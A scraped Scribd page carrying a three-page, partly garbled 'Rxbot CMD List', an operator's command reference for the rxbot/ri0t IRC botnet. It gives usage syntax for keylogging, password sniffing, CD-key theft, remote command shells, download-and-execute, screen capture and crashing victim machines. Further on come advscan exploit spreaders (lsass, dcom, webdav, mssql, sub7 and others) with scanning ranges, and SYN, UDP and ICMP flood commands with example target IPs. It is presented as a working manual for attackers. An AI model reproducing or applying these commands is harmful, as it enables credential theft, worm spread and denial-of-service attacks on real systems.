Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Rxbot CMD List

    Enviado por

    ravi1434
    428 visualizações3 páginas
    This document contains commands for controlling a botnet and performing various exploits and attacks. It lists commands for controlling infected systems, running exploits against common services to spread to more systems, performing denial of service floods, and obtaining information from infected systems. The commands would allow an attacker to remotely control a large network of compromised devices for malicious purposes such as distributed denial of service attacks, theft of sensitive information, and device intrusion.

    Descrição original:

    Título original

    Rxbot Cmd List

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    TXT, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento
    This document contains commands for controlling a botnet and performing various exploits and attacks. It lists commands for controlling infected systems, running exploits against common services to spread to more systems, performing denial of service floods, and obtaining information from infected systems. The commands would allow an attacker to remotely control a large network of compromised devices for malicious purposes such as distributed denial of service attacks, theft of sensitive information, and device intrusion.

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    428 visualizações3 páginas

    Rxbot CMD List

    Enviado por

    ravi1434
    This document contains commands for controlling a botnet and performing various exploits and attacks. It lists commands for controlling infected systems, running exploits against common services to spread to more systems, performing denial of service floods, and obtaining information from infected systems. The commands would allow an attacker to remotely control a large network of compromised devices for malicious purposes such as distributed denial of service attacks, theft of sensitive information, and device intrusion.

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 3

    .rloginserver .get .redirect .update .download execute ) .execute .findfile .findfilestop .rename .mode .version .gethost .delay .

    secure .securestop .unsecure .ident on .ident off .keylog on .keylog off .join .part .netinfo .sysinfo .raw .prefix .open .server .dns .addalias .privmsg .action .cycle n #lolol .die t restart .email .httpcon .upload .reconnect .disconnect .status .mirccmd .cmd .system reboot .system shutdown .system logoff .threads .killthread all .getcdkeys .driveinfo .opencmd .cmdstop .httpserver .httpstop .tftpserver .tftpstop .crash .findpass

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

    rlogin server (login with putty) get filename.zip redirect update BotID. downloadC:\File.exe 1 ( 1 = execute : 0 = don`t execute C:\file.exe findfile file.exe C:\ findfilestop rename botfilename.exe botfilename2.exe mode +i-x version get host info delays action secures bot stopsecure unsecures bot enable ident server disable ident server enable key loger disable key loger join #Channel part #Channel netinfo sysinfo raw #Channel +o Himmler prefix $ (change prefix to...) open File server Irc.AnotherServer.Net dns host.name.net addalias " untested " privmsg #Channel Hello / Nickname **** u perform action cycle (do something repetitive) eg .cycle 5 joi

    * kill ur bot.exe " is will be back after the nex * * * * * * * * * * * * * * * * * * * * * * * email mx3.hotmail.com Subject Msg httpcon upload reconnect disconnect status mirccmd remote cmd (.opencmd to activate) restart bot victim machine shutdown bot victim machine logoff bot victim machine list threads kill all threads get cdkeys for windows / games get drivers info opencmd stopcmd httpserver C:\ or D:\ stop http server start tftp stop tftp crash bot victim machine ( destroy all system ) get bot victim passwords

    .nick * change bot nick .log * list bot log .clearlog * clear log list .procs * list all files running in bot victim P.c .procsstop * procsstop File.exe .killproc * killprocs File.exe .delete * delete C:\File.exe .list * list *.exe or *.zip or *.rar any extensions u w ant list from bot victim P.c .visit * visit ( hiden ) .readfile * readfile C:\file.txt .psniff on * pass sniff on .psniff off * pass sniff off .remove * remove bot completly from vistim pc psniff can steal any information about (Bots Net) (Ftp) (Php) (Http) (Mirc) (Users) (Accounts) (Admins) (Opers ) .net start .net stop .net pause .net continue .net delete .net share .net user .net send .capture video .capture screen .capture drivers .capture frame .clone irc.server.net:6667 #Channel .c_join .c_part .C_raw .c_mode .c_nick .c_privmsg .c_notice .c_rndnick .clonestop .c_quit -=-=-=-=-=-=-=-=-=-=-=; Using Exploits ; -=-=-=-=-=-=-=-=-=-=-=ri0t r00t b0t comes with many exploits listed below is how to use them: -r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62 .150.15.15 ) the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method -b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255 -a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.25 5 -s = silent u can used with all Bot Commands, no reply msg from the bots x = ip range ex: 0 to 255 u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r 100 = scanner threads 5 = delay in sec 999 = time of scanner .advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 44 5 .advscan iis5ssl 100 5 999 -b * IIS 5 SSL Exploit Spreader Using Por t 443 .advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135

    .advscan dcom445 100 5 999 -r -s .advscan dcom1025 100 5 999 -b -s 5 ( is **** ) .advscan dcom2-135 100 5 999 -a -s 5 .advscan dcom2-445 100 5 999 -r 5 .advscan beagle1 100 5 999 -r 45 .advscan beagle2 100 5 999 -r 745 .advscan webdav 100 5 999 -r 0 .advscan wkssvc 100 5 999 -r .advscan wkssvc2 100 5 999 -r .advscan dameware 100 5 999 -r 6129 .advscan upnp 100 5 999 -r 0 .advscan mydoom 100 5 999 -r 127 .advscan netbios 100 5 999 -r 139 .advscan ntpass 100 5 999 -r 5 .advscan mssql 100 5 999 -r 33 .advscan vnc 100 5 999 -r .advscan optix 100 5 999 -r 0 .advscan sub7 100 5 999 -r 4 .advscan netdevil 100 5 999 -r 901 .advscan netdevil2 100 5 999 -r 903 .scanstats .scanstop -=-=-=-=-=-=-=-=-=-=-=-=; Flooders for the nubs ; -=-=-=-=-=-=-=-=-=-=-=-=.icmpflood .synflood .udpflood .pingflood .tcpflood .icmpstop .tcpstop .synstop .udpstop .pingstop

    * Dcom Exploit Spreader Using Port 445 * Dcom Exploit Spreader Using Port 102 * Dcom2 Exploit Spreader Using Port 13 * Dcom2 Exploit Spreader Using Port 44 * Bagle Exploit Spreader Using Port 27 * Bagle2 Exploit Spreader Using Port 2 * WebDav Exploit Spreader Using Port 8 * Wks Exploit Spreader Using Port 135 * Wks Exploit Spreader Using Port 445 * DameWare Exploit Spreader Using Port * UPNP Exploit Spreader Using Port 500 * MyDoom Exploit Spreader Using Port 3 * NetBios Exploit Spreader Using Port * NB+NP Exploit Spreader Using Port 44 * MSSQL Exploit Spreader Using Port 14 * VNC Exploit spreader Using Port 5900 * Optix Trojan Spreader Using Port 341 * Sub7 Trojan Spreader Using Port 2737 * NetDevil Trojan Spreader Using Port * NetDevil Trojan Spreader Using Port * Get Scan Stats * Stop Scanning

    * * * * *

    icmpflood 62.150.15.15 99999 synflood 62.150.15.15 1000 2000 udpflood Ip Number Size Delay pingflood Ip Number Size Delay Ip Port r

    Você também pode gostar